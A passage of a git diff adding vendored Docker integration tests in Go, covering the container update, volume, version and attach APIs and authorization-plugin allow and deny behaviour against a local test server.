checker.IsNil) + c.Assert(httpResp.StatusCode, checker.Equals, http.StatusNotFound) + c.Assert(httpResp.Header.Get("Content-Type"), checker.Contains, "text/plain") + b, err := readBody(body) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(string(b)), checker.Equals, "page not found") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go new file mode 100644 index 0000000000..dfe14ec7b0 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go @@ -0,0 +1,35 @@ +// +build !windows + +package main + +import ( + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestAPIUpdateContainer(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + testRequires(c, swapMemorySupport) + + name := "apiUpdateContainer" + hostConfig := map[string]interface{}{ + "Memory": 314572800, + "MemorySwap": 524288000, + } + dockerCmd(c, "run", "-d", "--name", name, "-m", "200M", "busybox", "top") + _, _, err := sockRequest("POST", "/containers/"+name+"/update", hostConfig) + c.Assert(err, check.IsNil) + + c.Assert(inspectField(c, name, "HostConfig.Memory"), checker.Equals, "314572800") + file := "/sys/fs/cgroup/memory/memory.limit_in_bytes" + out, _ := dockerCmd(c, "exec", name, "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "314572800") + + c.Assert(inspectField(c, name, "HostConfig.MemorySwap"), checker.Equals, "524288000") + file = "/sys/fs/cgroup/memory/memory.memsw.limit_in_bytes" + out, _ = dockerCmd(c, "exec", name, "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "524288000") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go new file mode 100644 index 0000000000..eb2de5904a --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go @@ -0,0 +1,23 @@ +package main + +import ( + "encoding/json" + "net/http" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestGetVersion(c *check.C) { + status, body, err := sockRequest("GET", "/version", nil) + c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(err, checker.IsNil) + + var v types.Version + + c.Assert(json.Unmarshal(body, &v), checker.IsNil) + + c.Assert(v.Version, checker.Equals, dockerversion.Version, check.Commentf("Version mismatch")) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go new file mode 100644 index 0000000000..d1d44005e0 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go @@ -0,0 +1,89 @@ +package main + +import ( + "encoding/json" + "net/http" + "path/filepath" + + "github.com/docker/docker/api/types" + volumetypes "github.com/docker/docker/api/types/volume" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestVolumesAPIList(c *check.C) { + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + dockerCmd(c, "run", "-v", prefix+"/foo", "busybox") + + status, b, err := sockRequest("GET", "/volumes", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + var volumes volumetypes.VolumesListOKBody + c.Assert(json.Unmarshal(b, &volumes), checker.IsNil) + + c.Assert(len(volumes.Volumes), checker.Equals, 1, check.Commentf("\n%v", volumes.Volumes)) +} + +func (s *DockerSuite) TestVolumesAPICreate(c *check.C) { + config := volumetypes.VolumesCreateBody{ + Name: "test", + } + status, b, err := sockRequest("POST", "/volumes/create", config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusCreated, check.Commentf(string(b))) + + var vol types.Volume + err = json.Unmarshal(b, &vol) + c.Assert(err, checker.IsNil) + + c.Assert(filepath.Base(filepath.Dir(vol.Mountpoint)), checker.Equals, config.Name) +} + +func (s *DockerSuite) TestVolumesAPIRemove(c *check.C) { + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + dockerCmd(c, "run", "-v", prefix+"/foo", "--name=test", "busybox") + + status, b, err := sockRequest("GET", "/volumes", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + var volumes volumetypes.VolumesListOKBody + c.Assert(json.Unmarshal(b, &volumes), checker.IsNil) + c.Assert(len(volumes.Volumes), checker.Equals, 1, check.Commentf("\n%v", volumes.Volumes)) + + v := volumes.Volumes[0] + status, _, err = sockRequest("DELETE", "/volumes/"+v.Name, nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusConflict, check.Commentf("Should not be able to remove a volume that is in use")) + + dockerCmd(c, "rm", "-f", "test") + status, data, err := sockRequest("DELETE", "/volumes/"+v.Name, nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent, check.Commentf(string(data))) + +} + +func (s *DockerSuite) TestVolumesAPIInspect(c *check.C) { + config := volumetypes.VolumesCreateBody{ + Name: "test", + } + status, b, err := sockRequest("POST", "/volumes/create", config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusCreated, check.Commentf(string(b))) + + status, b, err = sockRequest("GET", "/volumes", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(b))) + + var volumes volumetypes.VolumesListOKBody + c.Assert(json.Unmarshal(b, &volumes), checker.IsNil) + c.Assert(len(volumes.Volumes), checker.Equals, 1, check.Commentf("\n%v", volumes.Volumes)) + + var vol types.Volume + status, b, err = sockRequest("GET", "/volumes/"+config.Name, nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(b))) + c.Assert(json.Unmarshal(b, &vol), checker.IsNil) + c.Assert(vol.Name, checker.Equals, config.Name) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go new file mode 100644 index 0000000000..2df4fdc4d2 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go @@ -0,0 +1,168 @@ +package main + +import ( + "bufio" + "fmt" + "io" + "os/exec" + "runtime" + "strings" + "sync" + "time" + + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/go-check/check" +) + +const attachWait = 5 * time.Second + +func (s *DockerSuite) TestAttachMultipleAndRestart(c *check.C) { + endGroup := &sync.WaitGroup{} + startGroup := &sync.WaitGroup{} + endGroup.Add(3) + startGroup.Add(3) + + err := waitForContainer("attacher", "-d", "busybox", "/bin/sh", "-c", "while true; do sleep 1; echo hello; done") + c.Assert(err, check.IsNil) + + startDone := make(chan struct{}) + endDone := make(chan struct{}) + + go func() { + endGroup.Wait() + close(endDone) + }() + + go func() { + startGroup.Wait() + close(startDone) + }() + + for i := 0; i < 3; i++ { + go func() { + cmd := exec.Command(dockerBinary, "attach", "attacher") + + defer func() { + cmd.Wait() + endGroup.Done() + }() + + out, err := cmd.StdoutPipe() + if err != nil { + c.Fatal(err) + } + defer out.Close() + + if err := cmd.Start(); err != nil { + c.Fatal(err) + } + + buf := make([]byte, 1024) + + if _, err := out.Read(buf); err != nil && err != io.EOF { + c.Fatal(err) + } + + startGroup.Done() + + if !strings.Contains(string(buf), "hello") { + c.Fatalf("unexpected output %s expected hello\n", string(buf)) + } + }() + } + + select { + case <-startDone: + case <-time.After(attachWait): + c.Fatalf("Attaches did not initialize properly") + } + + dockerCmd(c, "kill", "attacher") + + select { + case <-endDone: + case <-time.After(attachWait): + c.Fatalf("Attaches did not finish properly") + } +} + +func (s *DockerSuite) TestAttachTTYWithoutStdin(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "-ti", "busybox") + + id := strings.TrimSpace(out) + c.Assert(waitRun(id), check.IsNil) + + done := make(chan error) + go func() { + defer close(done) + + cmd := exec.Command(dockerBinary, "attach", id) + if _, err := cmd.StdinPipe(); err != nil { + done <- err + return + } + + expected := "the input device is not a TTY" + if runtime.GOOS == "windows" { + expected += ". If you are using mintty, try prefixing the command with 'winpty'" + } + if out, _, err := runCommandWithOutput(cmd); err == nil { + done <- fmt.Errorf("attach should have failed") + return + } else if !strings.Contains(out, expected) { + done <- fmt.Errorf("attach failed with error %q: expected %q", out, expected) + return + } + }() + + select { + case err := <-done: + c.Assert(err, check.IsNil) + case <-time.After(attachWait): + c.Fatal("attach is running but should have failed") + } +} + +func (s *DockerSuite) TestAttachDisconnect(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-di", "busybox", "/bin/cat") + id := strings.TrimSpace(out) + + cmd := exec.Command(dockerBinary, "attach", id) + stdin, err := cmd.StdinPipe() + if err != nil { + c.Fatal(err) + } + defer stdin.Close() + stdout, err := cmd.StdoutPipe() + c.Assert(err, check.IsNil) + defer stdout.Close() + c.Assert(cmd.Start(), check.IsNil) + defer cmd.Process.Kill() + + _, err = stdin.Write([]byte("hello\n")) + c.Assert(err, check.IsNil) + out, err = bufio.NewReader(stdout).ReadString('\n') + c.Assert(err, check.IsNil) + c.Assert(strings.TrimSpace(out), check.Equals, "hello") + + c.Assert(stdin.Close(), check.IsNil) + + // Expect container to still be running after stdin is closed + running := inspectField(c, id, "State.Running") + c.Assert(running, check.Equals, "true") +} + +func (s *DockerSuite) TestAttachPausedContainer(c *check.C) { + testRequires(c, IsPausable) + defer unpauseAllContainers() + runSleepingContainer(c, "-d", "--name=test") + dockerCmd(c, "pause", "test") + + result := dockerCmdWithResult("attach", "test") + c.Assert(result, icmd.Matches, icmd.Expected{ + Error: "exit status 1", + ExitCode: 1, + Err: "You cannot attach to a paused container, unpause it first", + }) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go new file mode 100644 index 0000000000..fb794ccc40 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go @@ -0,0 +1,237 @@ +// +build !windows + +package main + +import ( + "bufio" + "io/ioutil" + "os/exec" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/stringid" + "github.com/go-check/check" + "github.com/kr/pty" +) + +// #9860 Make sure attach ends when container ends (with no errors) +func (s *DockerSuite) TestAttachClosedOnContainerStop(c *check.C) { + testRequires(c, SameHostDaemon) + + out, _ := dockerCmd(c, "run", "-dti", "busybox", "/bin/sh", "-c", `trap 'exit 0' SIGTERM; while true; do sleep 1; done`) + + id := strings.TrimSpace(out) + c.Assert(waitRun(id), check.IsNil) + + pty, tty, err := pty.Open() + c.Assert(err, check.IsNil) + + attachCmd := exec.Command(dockerBinary, "attach", id) + attachCmd.Stdin = tty + attachCmd.Stdout = tty + attachCmd.Stderr = tty + err = attachCmd.Start() + c.Assert(err, check.IsNil) + + errChan := make(chan error) + go func() { + time.Sleep(300 * time.Millisecond) + defer close(errChan) + // Container is waiting for us to signal it to stop + dockerCmd(c, "stop", id) + // And wait for the attach command to end + errChan <- attachCmd.Wait() + }() + + // Wait for the docker to end (should be done by the + // stop command in the go routine) + dockerCmd(c, "wait", id) + + select { + case err := <-errChan: + tty.Close() + out, _ := ioutil.ReadAll(pty) + c.Assert(err, check.IsNil, check.Commentf("out: %v", string(out))) + case <-time.After(attachWait): + c.Fatal("timed out without attach returning") + } + +} + +func (s *DockerSuite) TestAttachAfterDetach(c *check.C) { + name := "detachtest" + + cpty, tty, err := pty.Open() + c.Assert(err, checker.IsNil, check.Commentf("Could not open pty: %v", err)) + cmd := exec.Command(dockerBinary, "run", "-ti", "--name", name, "busybox") + cmd.Stdin = tty + cmd.Stdout = tty + cmd.Stderr = tty + + errChan := make(chan error) + go func() { + errChan <- cmd.Run() + close(errChan) + }() + + c.Assert(waitRun(name), check.IsNil) + + cpty.Write([]byte{16}) + time.Sleep(100 * time.Millisecond) + cpty.Write([]byte{17}) + + select { + case err := <-errChan: + if err != nil { + buff := make([]byte, 200) + tty.Read(buff) + c.Fatalf("%s: %s", err, buff) + } + case <-time.After(5 * time.Second): + c.Fatal("timeout while detaching") + } + + cpty, tty, err = pty.Open() + c.Assert(err, checker.IsNil, check.Commentf("Could not open pty: %v", err)) + + cmd = exec.Command(dockerBinary, "attach", name) + cmd.Stdin = tty + cmd.Stdout = tty + cmd.Stderr = tty + + err = cmd.Start() + c.Assert(err, checker.IsNil) + + bytes := make([]byte, 10) + var nBytes int + readErr := make(chan error, 1) + + go func() { + time.Sleep(500 * time.Millisecond) + cpty.Write([]byte("\n")) + time.Sleep(500 * time.Millisecond) + + nBytes, err = cpty.Read(bytes) + cpty.Close() + readErr <- err + }() + + select { + case err := <-readErr: + c.Assert(err, check.IsNil) + case <-time.After(2 * time.Second): + c.Fatal("timeout waiting for attach read") + } + + err = cmd.Wait() + c.Assert(err, checker.IsNil) + + c.Assert(string(bytes[:nBytes]), checker.Contains, "/ #") + +} + +// TestAttachDetach checks that attach in tty mode can be detached using the long container ID +func (s *DockerSuite) TestAttachDetach(c *check.C) { + out, _ := dockerCmd(c, "run", "-itd", "busybox", "cat") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), check.IsNil) + + cpty, tty, err := pty.Open() + c.Assert(err, check.IsNil) + defer cpty.Close() + + cmd := exec.Command(dockerBinary, "attach", id) + cmd.Stdin = tty + stdout, err := cmd.StdoutPipe() + c.Assert(err, check.IsNil) + defer stdout.Close() + err = cmd.Start() + c.Assert(err, check.IsNil) + c.Assert(waitRun(id), check.IsNil) + + _, err = cpty.Write([]byte("hello\n")) + c.Assert(err, check.IsNil) + out, err = bufio.NewReader(stdout).ReadString('\n') + c.Assert(err, check.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "hello", check.Commentf("expected 'hello', got %q", out)) + + // escape sequence + _, err = cpty.Write([]byte{16}) + c.Assert(err, checker.IsNil) + time.Sleep(100 * time.Millisecond) + _, err = cpty.Write([]byte{17}) + c.Assert(err, checker.IsNil) + + ch := make(chan struct{}) + go func() { + cmd.Wait() + ch <- struct{}{} + }() + + running := inspectField(c, id, "State.Running") + c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running")) + + go func() { + dockerCmd(c, "kill", id) + }() + + select { + case <-ch: + case <-time.After(10 * time.Millisecond): + c.Fatal("timed out waiting for container to exit") + } + +} + +// TestAttachDetachTruncatedID checks that attach in tty mode can be detached +func (s *DockerSuite) TestAttachDetachTruncatedID(c *check.C) { + out, _ := dockerCmd(c, "run", "-itd", "busybox", "cat") + id := stringid.TruncateID(strings.TrimSpace(out)) + c.Assert(waitRun(id), check.IsNil) + + cpty, tty, err := pty.Open() + c.Assert(err, checker.IsNil) + defer cpty.Close() + + cmd := exec.Command(dockerBinary, "attach", id) + cmd.Stdin = tty + stdout, err := cmd.StdoutPipe() + c.Assert(err, checker.IsNil) + defer stdout.Close() + err = cmd.Start() + c.Assert(err, checker.IsNil) + + _, err = cpty.Write([]byte("hello\n")) + c.Assert(err, checker.IsNil) + out, err = bufio.NewReader(stdout).ReadString('\n') + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "hello", check.Commentf("expected 'hello', got %q", out)) + + // escape sequence + _, err = cpty.Write([]byte{16}) + c.Assert(err, checker.IsNil) + time.Sleep(100 * time.Millisecond) + _, err = cpty.Write([]byte{17}) + c.Assert(err, checker.IsNil) + + ch := make(chan struct{}) + go func() { + cmd.Wait() + ch <- struct{}{} + }() + + running := inspectField(c, id, "State.Running") + c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running")) + + go func() { + dockerCmd(c, "kill", id) + }() + + select { + case <-ch: + case <-time.After(10 * time.Millisecond): + c.Fatal("timed out waiting for container to exit") + } + +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go new file mode 100644 index 0000000000..8a669fb379 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go @@ -0,0 +1,133 @@ +// +build !windows + +package main + +import ( + "fmt" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +var ( + authzPluginName = "riyaz/authz-no-volume-plugin" + authzPluginTag = "latest" + authzPluginNameWithTag = authzPluginName + ":" + authzPluginTag + authzPluginBadManifestName = "riyaz/authz-plugin-bad-manifest" + nonexistentAuthzPluginName = "riyaz/nonexistent-authz-plugin" +) + +func init() { + check.Suite(&DockerAuthzV2Suite{ + ds: &DockerSuite{}, + }) +} + +type DockerAuthzV2Suite struct { + ds *DockerSuite + d *Daemon +} + +func (s *DockerAuthzV2Suite) SetUpTest(c *check.C) { + testRequires(c, DaemonIsLinux, Network) + s.d = NewDaemon(c) + c.Assert(s.d.Start(), check.IsNil) +} + +func (s *DockerAuthzV2Suite) TearDownTest(c *check.C) { + s.d.Stop() + s.ds.TearDownTest(c) +} + +func (s *DockerAuthzV2Suite) TestAuthZPluginAllowNonVolumeRequest(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + // Install authz plugin + _, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", authzPluginNameWithTag) + c.Assert(err, checker.IsNil) + // start the daemon with the plugin and load busybox, --net=none build fails otherwise + // because it needs to pull busybox + c.Assert(s.d.Restart("--authorization-plugin="+authzPluginNameWithTag), check.IsNil) + c.Assert(s.d.LoadBusybox(), check.IsNil) + + // defer disabling the plugin + defer func() { + c.Assert(s.d.Restart(), check.IsNil) + _, err = s.d.Cmd("plugin", "disable", authzPluginNameWithTag) + c.Assert(err, checker.IsNil) + _, err = s.d.Cmd("plugin", "rm", authzPluginNameWithTag) + c.Assert(err, checker.IsNil) + }() + + // Ensure docker run command and accompanying docker ps are successful + out, err := s.d.Cmd("run", "-d", "busybox", "top") + c.Assert(err, check.IsNil) + + id := strings.TrimSpace(out) + + out, err = s.d.Cmd("ps") + c.Assert(err, check.IsNil) + c.Assert(assertContainerList(out, []string{id}), check.Equals, true) +} + +func (s *DockerAuthzV2Suite) TestAuthZPluginRejectVolumeRequests(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + // Install authz plugin + _, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", authzPluginNameWithTag) + c.Assert(err, checker.IsNil) + + // restart the daemon with the plugin + c.Assert(s.d.Restart("--authorization-plugin="+authzPluginNameWithTag), check.IsNil) + + // defer disabling the plugin + defer func() { + c.Assert(s.d.Restart(), check.IsNil) + _, err = s.d.Cmd("plugin", "disable", authzPluginNameWithTag) + c.Assert(err, checker.IsNil) + _, err = s.d.Cmd("plugin", "rm", authzPluginNameWithTag) + c.Assert(err, checker.IsNil) + }() + + out, err := s.d.Cmd("volume", "create") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)) + + out, err = s.d.Cmd("volume", "ls") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)) + + // The plugin will block the command before it can determine the volume does not exist + out, err = s.d.Cmd("volume", "rm", "test") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)) + + out, err = s.d.Cmd("volume", "inspect", "test") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)) + + out, err = s.d.Cmd("volume", "prune", "-f") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)) +} + +func (s *DockerAuthzV2Suite) TestAuthZPluginBadManifestFailsDaemonStart(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + // Install authz plugin with bad manifest + _, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", authzPluginBadManifestName) + c.Assert(err, checker.IsNil) + + // start the daemon with the plugin, it will error + c.Assert(s.d.Restart("--authorization-plugin="+authzPluginBadManifestName), check.NotNil) + + // restarting the daemon without requiring the plugin will succeed + c.Assert(s.d.Restart(), check.IsNil) +} + +func (s *DockerAuthzV2Suite) TestNonexistentAuthZPluginFailsDaemonStart(c *check.C) { + testRequires(c, DaemonIsLinux, Network) + // start the daemon with a non-existent authz plugin, it will error + c.Assert(s.d.Restart("--authorization-plugin="+nonexistentAuthzPluginName), check.NotNil) + + // restarting the daemon without requiring the plugin will succeed + c.Assert(s.d.Restart(), check.IsNil) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go new file mode 100644 index 0000000000..a826249e2e --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go @@ -0,0 +1,477 @@ +// +build !windows + +package main + +import ( + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "net/http/httptest" + "os" + "path/filepath" + "strings" + + "bufio" + "bytes" + "os/exec" + "strconv" + "time" + + "net" + "net/http/httputil" + "net/url" + + "github.com/docker/docker/pkg/authorization" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/plugins" + "github.com/go-check/check" +) + +const ( + testAuthZPlugin = "authzplugin" + unauthorizedMessage = "User unauthorized authz plugin" + errorMessage = "something went wrong..." + containerListAPI = "/containers/json" +) + +var ( + alwaysAllowed = []string{"/_ping", "/info"} +) + +func init() { + check.Suite(&DockerAuthzSuite{ + ds: &DockerSuite{}, + }) +} + +type DockerAuthzSuite struct { + server *httptest.Server + ds *DockerSuite + d *Daemon + ctrl *authorizationController +} + +type authorizationController struct { + reqRes authorization.Response // reqRes holds the plugin response to the initial client request + resRes authorization.Response // resRes holds the plugin response to the daemon response + psRequestCnt int // psRequestCnt counts the number of calls to list container request api + psResponseCnt int // psResponseCnt counts the number of calls to list containers response API + requestsURIs []string // requestsURIs stores all request URIs that are sent to the authorization controller + reqUser string + resUser string +} + +func (s *DockerAuthzSuite) SetUpTest(c *check.C) { + s.d = NewDaemon(c) + s.ctrl = &authorizationController{} +} + +func (s *DockerAuthzSuite) TearDownTest(c *check.C) { + s.d.Stop() + s.ds.TearDownTest(c) + s.ctrl = nil +} + +func (s *DockerAuthzSuite) SetUpSuite(c *check.C) { + mux := http.NewServeMux() + s.server = httptest.NewServer(mux) + + mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) { + b, err := json.Marshal(plugins.Manifest{Implements: []string{authorization.AuthZApiImplements}}) + c.Assert(err, check.IsNil) + w.Write(b) + }) + + mux.HandleFunc("/AuthZPlugin.AuthZReq", func(w http.ResponseWriter, r *http.Request) { + defer r.Body.Close() + body, err := ioutil.ReadAll(r.Body) + c.Assert(err, check.IsNil) + authReq := authorization.Request{} + err = json.Unmarshal(body, &authReq) + c.Assert(err, check.IsNil) + + assertBody(c, authReq.RequestURI, authReq.RequestHeaders, authReq.RequestBody) + assertAuthHeaders(c, authReq.RequestHeaders) + + // Count only container list api + if strings.HasSuffix(authReq.RequestURI, containerListAPI) { + s.ctrl.psRequestCnt++ + } + + s.ctrl.requestsURIs = append(s.ctrl.requestsURIs, authReq.RequestURI) + + reqRes := s.ctrl.reqRes + if isAllowed(authReq.RequestURI) { + reqRes = authorization.Response{Allow: true} + } + if reqRes.Err != "" { + w.WriteHeader(http.StatusInternalServerError) + } + b, err := json.Marshal(reqRes) + c.Assert(err, check.IsNil) + s.ctrl.reqUser = authReq.User + w.Write(b) + }) + + mux.HandleFunc("/AuthZPlugin.AuthZRes", func(w http.ResponseWriter, r *http.Request) { + defer r.Body.Close() + body, err := ioutil.ReadAll(r.Body) + c.Assert(err, check.IsNil) + authReq := authorization.Request{} + err = json.Unmarshal(body, &authReq) + c.Assert(err, check.IsNil) + + assertBody(c, authReq.RequestURI, authReq.ResponseHeaders, authReq.ResponseBody) + assertAuthHeaders(c, authReq.ResponseHeaders) + + // Count only container list api + if strings.HasSuffix(authReq.RequestURI, containerListAPI) { + s.ctrl.psResponseCnt++ + } + resRes := s.ctrl.resRes + if isAllowed(authReq.RequestURI) { + resRes = authorization.Response{Allow: true} + } + if resRes.Err != "" { + w.WriteHeader(http.StatusInternalServerError) + } + b, err := json.Marshal(resRes) + c.Assert(err, check.IsNil) + s.ctrl.resUser = authReq.User + w.Write(b) + }) + + err := os.MkdirAll("/etc/docker/plugins", 0755) + c.Assert(err, checker.IsNil) + + fileName := fmt.Sprintf("/etc/docker/plugins/%s.spec", testAuthZPlugin) + err = ioutil.WriteFile(fileName, []byte(s.server.URL), 0644) + c.Assert(err, checker.IsNil) +} + +// check for always allowed endpoints to not inhibit test framework functions +func isAllowed(reqURI string) bool { + for _, endpoint := range alwaysAllowed { + if strings.HasSuffix(reqURI, endpoint) { + return true + } + } + return false +} + +// assertAuthHeaders validates authentication headers are removed +func assertAuthHeaders(c *check.C, headers map[string]string) error { + for k := range headers { + if strings.Contains(strings.ToLower(k), "auth") || strings.Contains(strings.ToLower(k), "x-registry") { + c.Errorf("Found authentication headers in request '%v'", headers) + } + } + return nil +} + +// assertBody asserts that body is removed for non text/json requests +func assertBody(c *check.C, requestURI string, headers map[string]string, body []byte) { + if strings.Contains(strings.ToLower(requestURI), "auth") && len(body) > 0 { + //return fmt.Errorf("Body included for authentication endpoint %s", string(body)) + c.Errorf("Body included for authentication endpoint %s", string(body)) + } + + for k, v := range headers { + if strings.EqualFold(k, "Content-Type") && strings.HasPrefix(v, "text/") || v == "application/json" { + return + } + } + if len(body) > 0 { + c.Errorf("Body included while it should not (Headers: '%v')", headers) + } +} + +func (s *DockerAuthzSuite) TearDownSuite(c *check.C) { + if s.server == nil { + return + } + + s.server.Close() + + err := os.RemoveAll("/etc/docker/plugins") + c.Assert(err, checker.IsNil) +} + +func (s *DockerAuthzSuite) TestAuthZPluginAllowRequest(c *check.C) { + // start the daemon and load busybox, --net=none build fails otherwise + // cause it needs to pull busybox + c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin), check.IsNil) + s.ctrl.reqRes.Allow = true + s.ctrl.resRes.Allow = true + c.Assert(s.d.LoadBusybox(), check.IsNil) + + // Ensure command successful + out, err := s.d.Cmd("run", "-d", "busybox", "top") + c.Assert(err, check.IsNil) + + id := strings.TrimSpace(out) + assertURIRecorded(c, s.ctrl.requestsURIs, "/containers/create") + assertURIRecorded(c, s.ctrl.requestsURIs, fmt.Sprintf("/containers/%s/start", id)) + + out, err = s.d.Cmd("ps") + c.Assert(err, check.IsNil) + c.Assert(assertContainerList(out, []string{id}), check.Equals, true) + c.Assert(s.ctrl.psRequestCnt, check.Equals, 1) + c.Assert(s.ctrl.psResponseCnt, check.Equals, 1) +} + +func (s *DockerAuthzSuite) TestAuthZPluginTls(c *check.C) { + + const testDaemonHTTPSAddr = "tcp://localhost:4271" + // start the daemon and load busybox, --net=none build fails otherwise + // cause it needs to pull busybox + if err := s.d.Start( + "--authorization-plugin="+testAuthZPlugin, + "--tlsverify", + "--tlscacert", + "fixtures/https/ca.pem", + "--tlscert", + "fixtures/https/server-cert.pem", + "--tlskey", + "fixtures/https/server-key.pem", + "-H", testDaemonHTTPSAddr); err != nil { + c.Fatalf("Could not start daemon with busybox: %v", err) + } + + s.ctrl.reqRes.Allow = true + s.ctrl.resRes.Allow = true + + out, _ := dockerCmd( + c, + "--tlsverify", + "--tlscacert", "fixtures/https/ca.pem", + "--tlscert", "fixtures/https/client-cert.pem", + "--tlskey", "fixtures/https/client-key.pem", + "-H", + testDaemonHTTPSAddr, + "version", + ) + if !strings.Contains(out, "Server") { + c.Fatalf("docker version should return information of server side") + } + + c.Assert(s.ctrl.reqUser, check.Equals, "client") + c.Assert(s.ctrl.resUser, check.Equals, "client") +} + +func (s *DockerAuthzSuite) TestAuthZPluginDenyRequest(c *check.C) { + err := s.d.Start("--authorization-plugin=" + testAuthZPlugin) + c.Assert(err, check.IsNil) + s.ctrl.reqRes.Allow = false + s.ctrl.reqRes.Msg = unauthorizedMessage + + // Ensure command is blocked + res, err := s.d.Cmd("ps") + c.Assert(err, check.NotNil) + c.Assert(s.ctrl.psRequestCnt, check.Equals, 1) + c.Assert(s.ctrl.psResponseCnt, check.Equals, 0) + + // Ensure unauthorized message appears in response + c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: authorization denied by plugin %s: %s\n", testAuthZPlugin, unauthorizedMessage)) +} + +// TestAuthZPluginAPIDenyResponse validates that when authorization plugin deny the request, the status code is forbidden +func (s *DockerAuthzSuite) TestAuthZPluginAPIDenyResponse(c *check.C) { + err := s.d.Start("--authorization-plugin=" + testAuthZPlugin) + c.Assert(err, check.IsNil) + s.ctrl.reqRes.Allow = false + s.ctrl.resRes.Msg = unauthorizedMessage + + daemonURL, err := url.Parse(s.d.sock()) + + conn, err := net.DialTimeout(daemonURL.Scheme, daemonURL.Path, time.Second*10) + c.Assert(err, check.IsNil) + client := httputil.NewClientConn(conn, nil) + req, err := http.NewRequest("GET", "/version", nil) + c.Assert(err, check.IsNil) + resp, err := client.Do(req) + + c.Assert(err, check.IsNil) + c.Assert(resp.StatusCode, checker.Equals, http.StatusForbidden) + c.Assert(err, checker.IsNil) +} + +func (s *DockerAuthzSuite) TestAuthZPluginDenyResponse(c *check.C) { + err := s.d.Start("--authorization-plugin=" + testAuthZPlugin) + c.Assert(err, check.IsNil) + s.ctrl.reqRes.Allow = true + 